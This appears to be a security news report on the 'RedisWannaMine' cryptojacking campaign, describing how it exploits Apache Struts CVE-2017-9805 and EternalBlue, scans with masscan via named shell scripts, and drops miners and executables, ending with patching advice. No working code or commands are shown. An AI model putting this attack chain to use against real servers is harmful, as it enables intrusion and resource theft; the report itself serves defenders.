The first attack dubbed ‘RedisWannaMine’ has been found to be using remote code execution vulnerabilities such as CVE-2017-9805 (REST plugin vulnerability in Apache Struts) to download a cryptominer and execute an external resource.
‘RedisWannaMine’, unlike most cryptojacking threats, is more complex with regards to evasion techniques and capabilities. It demonstrates a worm-like behaviour combined with advanced exploits to increase the attackers’ infection rate.
The external resource was located on a remote host which included several suspicious files, one of which was a shell script that downloads a cryptominer called ‘transfer.sh’. Upon successful infection, this file installs a publicly available tool called ‘masscan’ allocated from GitHub as an Internet port scanner that can sweep the entire internet. A process called ‘redisscan.sh’ can then be launched which utilises ‘masscan’ to discover and infect public Redis servers with cryptomining malware.
The campaign has also been observed using the EternalBlue Server Message Block (SMB) exploit. This attack vector involves a script that runs another scanning process called ‘ebscan.sh’, that uses the masscan tool to discover publicly available Windows servers with the SMB vulnerability CVE-2017-0144.
‘ebrun.sh’ then runs a Python implementation of the EternalBlue exploit – the exploit that was used to spread WannaCry ransomware, one of the biggest cyberattacks in the world. This process then drops the file ‘x64.bin’ in the vulnerable machine, which contains code to create a malicious VBScript file. The file then downloads an executable from an external location, saves it in the vulnerable server as ‘admissioninit.exe’ and runs it.
- Patch their web applications and databases.
- Configure their Redis servers, which can be achieved with a simple firewall rule.
- Ensure that machines aren’t running the vulnerable SMB protocol.